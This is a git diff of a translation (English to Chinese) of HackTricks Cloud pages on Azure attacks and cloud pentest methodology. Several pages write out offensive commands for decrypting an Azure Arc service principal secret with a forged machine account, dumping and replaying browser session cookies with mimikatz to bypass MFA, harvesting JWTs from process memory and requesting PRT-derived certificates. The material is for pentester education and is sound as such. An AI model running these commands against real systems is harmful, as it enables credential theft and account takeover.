integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1. +Azure Arc 允许通过组策略对象方法将新的内部服务器(加入域的服务器)集成到 Azure Arc 中。为此,微软提供了一个部署工具包,必要用于启动入驻程序。在 ArcEnableServerGroupPolicy.zip 文件中,可以找到以下脚本:DeployGPO.ps1、EnableAzureArc.ps1 和 AzureArcDeployment.psm1。 -When executed, the DeployGPO.ps1 script performs the following actions: +执行时,DeployGPO.ps1 脚本执行以下操作: -1. Creates the Azure Arc Servers Onboarding GPO within the local domain. -2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package. +1. 在本地域中创建 Azure Arc 服务器入驻 GPO。 +2. 将 EnableAzureArc.ps1 入驻脚本复制到为入驻过程创建的指定网络共享中,该共享还包含 Windows 安装包。 -When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script. - -An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. 
The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments. +运行此脚本时,系统管理员需要提供两个主要参数:**ServicePrincipalId** 和 **ServicePrincipalClientSecret**。此外,还需要其他参数,如域、托管共享的服务器的 FQDN 和共享名称。还必须向脚本提供租户 ID、资源组和其他必要信息等详细信息。 +在指定共享的 AzureArcDeploy 目录中使用 DPAPI-NG 加密生成一个加密的秘密。加密的秘密存储在名为 encryptedServicePrincipalSecret 的文件中。可以在 DeployGPO.ps1 脚本中找到证据,其中通过调用 ProtectBase64 以 $descriptor 和 $ServicePrincipalSecret 作为输入来执行加密。描述符由域计算机和域控制器组 SID 组成,确保 ServicePrincipalSecret 只能由域控制器和域计算机安全组解密,如脚本注释中所述。 ```powershell # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups $DomainComputersSID = "SID=" + $DomainComputersSID @@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR " Import-Module $PSScriptRoot\AzureArcDeployment.psm1 $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret) ``` - ### Exploit -We have the follow conditions: +我们有以下条件: -1. We have successfully penetrated the internal network. -2. We have the capability to create or assume control of a computer account within Active Directory. -3. We have discovered a network share containing the AzureArcDeploy directory. - -There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations. +1. 我们已经成功渗透了内部网络。 +2. 我们有能力在Active Directory中创建或控制计算机账户。 +3. 我们发现了一个包含AzureArcDeploy目录的网络共享。 +在AD环境中获取计算机账户有几种方法。最常见的方法之一是利用计算机账户配额。另一种方法涉及通过脆弱的ACL或各种其他错误配置来破坏计算机账户。 ```powershell Import-MKodule powermad New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` - -Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe. - +一旦获得机器账户,就可以使用该账户进行身份验证。我们可以使用带有 netonly 标志的 runas.exe 命令,或者使用 Rubeus.exe 进行 pass-the-ticket。 ```powershell runas /user:fake01$ /netonly powershell ``` @@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell ```powershell .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr ``` - -By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret. - +通过将计算机帐户的 TGT 存储在内存中,我们可以使用以下脚本解密服务主体密钥。 ```powershell Import-Module .\AzureArcDeployment.psm1 @@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret) $ebs ``` +另外,我们可以使用 [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG)。 -Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG). - -At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal. 
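For instance, assuming the field names described above for ArcInfo.json (servicePrincipalClientId, TenantId) and the secret decrypted in the previous step, the login could look like this:
```bash
# Placeholders come from ArcInfo.json and the decrypted encryptedServicePrincipalSecret
az login --service-principal \
  --username "<servicePrincipalClientId>" \
  --password "<decrypted ServicePrincipalSecret>" \
  --tenant "<TenantId>"
az account show --output table   # confirm the service principal context
```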
+此时,我们可以从存储在与 encryptedServicePrincipalSecret 文件相同的网络共享上的 ArcInfo.json 文件中收集连接到 Azure 所需的其余信息。该文件包含以下详细信息:TenantId、servicePrincipalClientId、ResourceGroup 等。凭借这些信息,我们可以使用 Azure CLI 以被攻陷的服务主体身份进行身份验证。 ## References - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md index 2ddcbb0a5..b02aa928a 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md @@ -2,42 +2,38 @@ {{#include ../../../banners/hacktricks-training.md}} -## Local Token Storage and Security Considerations +## 本地令牌存储和安全考虑 -### Azure CLI (Command-Line Interface) +### Azure CLI(命令行界面) -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: +Azure CLI 本地存储令牌和敏感数据,带来安全隐患: -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - - Executed commands with credentials embedded. - - URLs accessed using tokens, potentially revealing sensitive information. +1. **访问令牌**:以明文存储在 `accessTokens.json` 中,位于 `C:\Users\\.Azure`。 +2. **订阅信息**:`azureProfile.json` 在同一目录中,保存订阅详细信息。 +3. **日志文件**:`.azure` 中的 `ErrorRecords` 文件夹可能包含暴露凭据的日志,例如: +- 嵌入凭据的执行命令。 +- 使用令牌访问的 URL,可能泄露敏感信息。 ### Azure PowerShell -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: +Azure PowerShell 也存储令牌和敏感数据,可以本地访问: -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. +1. **访问令牌**:`TokenCache.dat`,位于 `C:\Users\\.Azure`,以明文存储访问令牌。 +2. **服务主体秘密**:这些以未加密形式存储在 `AzureRmContext.json` 中。 +3. **令牌保存功能**:用户可以使用 `Save-AzContext` 命令持久化令牌,需谨慎使用以防止未经授权的访问。 -## Automatic Tools to find them +## 自动工具查找它们 - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) -## Security Recommendations +## 安全建议 -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: +考虑到敏感数据以明文存储,确保这些文件和目录的安全至关重要: -- Limiting access rights to these files. -- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -- Employing encryption for sensitive files where possible. -- Educating users about the risks and best practices for handling such sensitive information. 
+- 限制对这些文件的访问权限。 +- 定期监控和审计这些目录,以防未经授权的访问或意外更改。 +- 尽可能对敏感文件进行加密。 +- 教育用户有关处理此类敏感信息的风险和最佳实践。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md index f2a5f2f4d..a9fc037fa 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md @@ -4,40 +4,32 @@ ## Pass the Certificate (Azure) -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. +在 Azure 加入的机器中,可以使用 **必须由 Azure AD CA** 为所需用户(作为主题)颁发的证书,从一台机器认证到另一台机器,当两台机器都支持 **NegoEx** 认证机制时。 -In super simplified terms: +简单来说: -- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. +- 发起连接的机器(客户端) **需要 Azure AD 为用户颁发的证书**。 +- 客户端创建一个包含 PRT 和其他详细信息的 JSON Web Token (JWT) 头,使用派生密钥(使用会话密钥和安全上下文)对其进行签名,并 **将其发送到 Azure AD**。 +- Azure AD 使用客户端会话密钥和安全上下文验证 JWT 签名,检查 PRT 的有效性,并 **响应** 以 **证书**。 -In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: +在这种情况下,并在获取所有进行 [**Pass the PRT**](pass-the-prt.md) 攻击所需的信息后: -- Username -- Tenant ID +- 用户名 +- 租户 ID - PRT -- Security context -- Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** +- 安全上下文 +- 派生密钥 +可以使用工具 [**PrtToCert**](https://github.com/morRubin/PrtToCert)** 请求用户的 **P2P 证书**: ```bash RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] ``` - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. 
- +证书的有效期与PRT相同。要使用证书,可以使用python工具 [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC),该工具将**认证**到远程机器,运行**PSEXEC**并在受害者机器上**打开CMD**。这将允许我们再次使用Mimikatz获取另一个用户的PRT。 ```bash Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP ``` +## 参考文献 -## References - -- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +- 有关 Pass the Certificate 工作原理的更多细节,请查看原始帖子 [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md index f6695c40a..26ab3ae81 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md @@ -2,40 +2,34 @@ {{#include ../../../banners/hacktricks-training.md}} -## Why Cookies? +## 为什么选择 Cookies? -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. +浏览器 **cookies** 是一个很好的机制,可以 **绕过身份验证和 MFA**。因为用户已经在应用程序中进行了身份验证,所以会话 **cookie** 可以直接用于 **访问数据**,而无需重新进行身份验证。 -You can see where are **browser cookies located** in: +您可以查看 **浏览器 cookies 的位置** 在: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome {{#endref}} -## Attack +## 攻击 -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: +具有挑战性的是,这些 **cookies 是通过 Microsoft 数据保护 API (**DPAPI**) 加密的**。这是使用与用户相关的加密 [密钥进行加密](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords),这些 cookies 属于该用户。您可以在以下链接找到更多信息: {{#ref}} https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords {{#endref}} -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - +手握 Mimikatz,我能够 **提取用户的 cookies**,即使它们是加密的,使用以下命令: ```bash mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit ``` +对于 Azure,我们关心的身份验证 cookie 包括 **`ESTSAUTH`**、**`ESTSAUTHPERSISTENT`** 和 **`ESTSAUTHLIGHT`**。这些 cookie 的存在是因为用户最近在 Azure 上活跃。 -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. 
+只需导航到 login.microsoftonline.com 并添加 cookie **`ESTSAUTHPERSISTENT`**(由“保持登录”选项生成)或 **`ESTSAUTH`**。这样您将被认证。 ## References - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md index 28bc5b415..4cf77de34 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -1,11 +1,7 @@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) +# Az - 钓鱼主要刷新令牌 (Microsoft Entra) {{#include ../../../banners/hacktricks-training.md}} -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) +**检查:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md index a79c7a659..7ea7a97e3 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md @@ -2,10 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) +**查看帖子在** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) 虽然另一个解释相同内容的帖子可以在 [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) 找到 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md index 1ba819b3a..147ce9315 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md @@ -2,16 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -## **Basic Information** +## **基本信息** -As explained in [**this 
video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. +正如在[**这个视频**](https://www.youtube.com/watch?v=OHKZkXC4Duw)中解释的,一些与云同步的Microsoft软件(Excel、Teams...)可能会**以明文形式在内存中存储访问令牌**。因此,仅仅**转储**该进程的**内存**并**grep JWT令牌**可能会让你绕过MFA,获得对受害者在云中多个资源的访问权限。 -Steps: - -1. Dump the excel processes synchronized with in EntraID user with your favourite tool. -2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output -3. Find the tokens that interest you the most and run tools over them: +步骤: +1. 使用你喜欢的工具转储与EntraID用户同步的Excel进程。 +2. 运行:`string excel.dmp | grep 'eyJ0'`,并在输出中找到多个令牌 +3. 找到你最感兴趣的令牌,并对其运行工具: ```bash # Check the identity of the token curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq @@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sit ┌──(magichk㉿black-pearl)-[~] └─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>' ``` - -**Note that these kind of access tokens can be also found inside other processes.** +**请注意,这种访问令牌也可以在其他进程中找到。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md index 39ee71d6c..9c9fbd303 100644 --- a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md @@ -2,10 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. +要开始测试,您应该拥有一个具有**订阅的读取权限**和**AzureAD中的全局读取角色**的用户访问权限。如果在这种情况下您仍然**无法访问存储帐户的内容**,您可以通过**角色存储帐户贡献者**来修复它。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 0be67db54..6056b0a22 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -4,45 +4,44 @@
-## Basic Methodology +## 基本方法论 -Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment: +每个云都有其独特性,但一般来说,有一些**渗透测试人员应该检查的共同事项**在测试云环境时: -- **Benchmark checks** - - This will help you **understand the size** of the environment and **services used** - - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools** -- **Services Enumeration** - - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test. - - This will allow you to know **what is exactly being used** in the cloud env - - This will help a lot in the next steps -- **Check exposed assets** - - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed. - - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets) - - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?) -- **Check permissions** - - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used - - Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already - - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100) - - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**. - - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported. -- **Check Integrations** - - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env. - - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\ - For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data). - - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\ - For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud. 
+- **基准检查** +- 这将帮助你**了解环境的规模**和**使用的服务** +- 这也将使你能够找到一些**快速的错误配置**,因为你可以使用**自动化工具**执行大部分测试 +- **服务枚举** +- 如果你正确执行了基准测试,你可能不会在这里发现更多的错误配置,但你可能会发现一些在基准测试中未被关注的配置。 +- 这将使你知道**在云环境中到底使用了什么** +- 这在接下来的步骤中会有很大帮助 +- **检查暴露的资产** +- 这可以在前面的部分中完成,你需要**找出所有可能暴露**于互联网的内容以及如何访问它。 +- 这里我指的是**手动暴露的基础设施**,如具有网页的实例或其他暴露的端口,以及其他**可以配置为暴露的云管理服务**(如数据库或存储桶) +- 然后你应该检查**该资源是否可以被暴露**(机密信息?漏洞?暴露服务中的错误配置?) +- **检查权限** +- 在这里你应该**找出每个角色/用户的所有权限**以及它们是如何使用的 +- 过多的**高权限**(控制一切)账户?生成的密钥未使用?... 大部分这些检查应该已经在基准测试中完成 +- 如果客户使用OpenID或SAML或其他**联合**,你可能需要向他们询问更多关于**每个角色是如何分配的**的信息(管理员角色分配给1个用户或100个用户是不同的) +- **仅仅找到**哪些用户具有**管理员**权限“\*:\*”是不够的。还有很多**其他权限**,根据使用的服务可能非常**敏感**。 +- 此外,还有**潜在的权限提升**方式可以通过滥用权限来实现。所有这些都应该考虑在内,并且**尽可能多的权限提升路径**应该被报告。 +- **检查集成** +- 很可能在云环境中**与其他云或SaaS的集成**正在被使用。 +- 对于**你正在审计的云的集成**与其他平台,你应该通知**谁有权访问(滥用)该集成**,并且你应该询问**执行该操作的敏感性**。\ +例如,谁可以在AWS存储桶中写入数据,而GCP正在从中获取数据(询问在GCP处理该数据时该操作的敏感性)。 +- 对于**你正在审计的云内部**来自外部平台的集成,你应该询问**谁有外部访问权限(滥用)该集成**,并检查该数据是如何使用的。\ +例如,如果一个服务使用托管在GCR中的Docker镜像,你应该询问谁有权修改该镜像,以及在AWS云中执行该镜像时将获得哪些敏感信息和访问权限。 -## Multi-Cloud tools +## 多云工具 -There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. +有几种工具可以用于测试不同的云环境。安装步骤和链接将在本节中指明。 ### [PurplePanda](https://github.com/carlospolop/purplepanda) -A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.** +一个工具,用于**识别云及跨云/SaaS中的错误配置和权限提升路径。** {{#tabs }} {{#tab name="Install" }} - ```bash # You need to install and run neo4j also git clone https://github.com/carlospolop/PurplePanda @@ -54,29 +53,25 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687" export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda" python3 main.py -h # Get help ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash export GOOGLE_DISCOVERY=$(echo 'google: - file_path: "" - file_path: "" - service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) +service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64) python3 main.py -a -p google #Get basic info of the account to check it's correctly configured python3 main.py -e -p google #Enumerate the env ``` - {{#endtab }} {{#endtabs }} ### [Prowler](https://github.com/prowler-cloud/prowler) -It supports **AWS, GCP & Azure**. 
Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) - +它支持 **AWS, GCP & Azure**。请查看如何在 [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) 中配置每个提供商。 ```bash # Install pip install prowler @@ -91,14 +86,12 @@ prowler aws --profile custom-profile [-M csv json json-asff html] prowler --list-checks prowler --list-services ``` - ### [CloudSploit](https://github.com/aquasecurity/cloudsploit) AWS, Azure, Github, Google, Oracle, Alibaba {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="安装" }} ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git @@ -107,26 +100,22 @@ npm install ./index.js -h ## Docker instructions in github ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash ## You need to have creds for a service account and set them in config.js file ./index.js --cloud google --config ``` - {{#endtab }} {{#endtabs }} ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite) -AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure +AWS, Azure, GCP, 阿里云, Oracle Cloud Infrastructure {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="安装" }} ```bash mkdir scout; cd scout virtualenv -p python3 venv @@ -135,24 +124,21 @@ pip install scoutsuite scout --help ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash scout gcp --report-dir /tmp/gcp --user-account --all-projects ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account SCOUT_FOLDER_REPORT="/tmp" for pid in $(gcloud projects list --format="value(projectId)"); do - echo "================================================" - echo "Checking $pid" - mkdir "$SCOUT_FOLDER_REPORT/$pid" - scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" +echo "================================================" +echo "Checking $pid" +mkdir "$SCOUT_FOLDER_REPORT/$pid" +scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid" done ``` - {{#endtab }} {{#endtabs }} @@ -160,17 +146,14 @@ done {{#tabs }} {{#tab name="Install" }} -Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew: - +下载并安装 Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads))。或者使用 Brew: ``` brew tap turbot/tap brew install steampipe ``` - {{#endtab }} {{#tab name="GCP" }} - ```bash # Install gcp plugin steampipe plugin install gcp @@ -183,13 +166,11 @@ steampipe dashboard # To run all the checks from rhe cli steampipe check all ``` -
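Besides the compliance mod checks, ad-hoc SQL queries are handy for quick manual enumeration. For example (table and column names as exposed by the Steampipe GCP plugin, shown only as an illustration):
```bash
# Example ad-hoc queries against the configured GCP connection(s)
steampipe query "select name, project_id from gcp_project"
steampipe query "select name, location from gcp_storage_bucket"
```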
-Check all Projects - -In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script +检查所有项目 +为了检查所有项目,您需要生成 `gcp.spc` 文件,指示所有要测试的项目。您可以按照以下脚本中的指示进行操作。 ```bash FILEPATH="/tmp/gcp.spc" rm -rf "$FILEPATH" 2>/dev/null @@ -197,32 +178,30 @@ rm -rf "$FILEPATH" 2>/dev/null # Generate a json like object for each project for pid in $(gcloud projects list --format="value(projectId)"); do echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" { - plugin = \"gcp\" - project = \"$pid\" +plugin = \"gcp\" +project = \"$pid\" }" >> "$FILEPATH" done # Generate the aggragator to call echo 'connection "gcp_all" { - plugin = "gcp" - type = "aggregator" - connections = ["gcp_*"] +plugin = "gcp" +type = "aggregator" +connections = ["gcp_*"] }' >> "$FILEPATH" echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated" ``` -
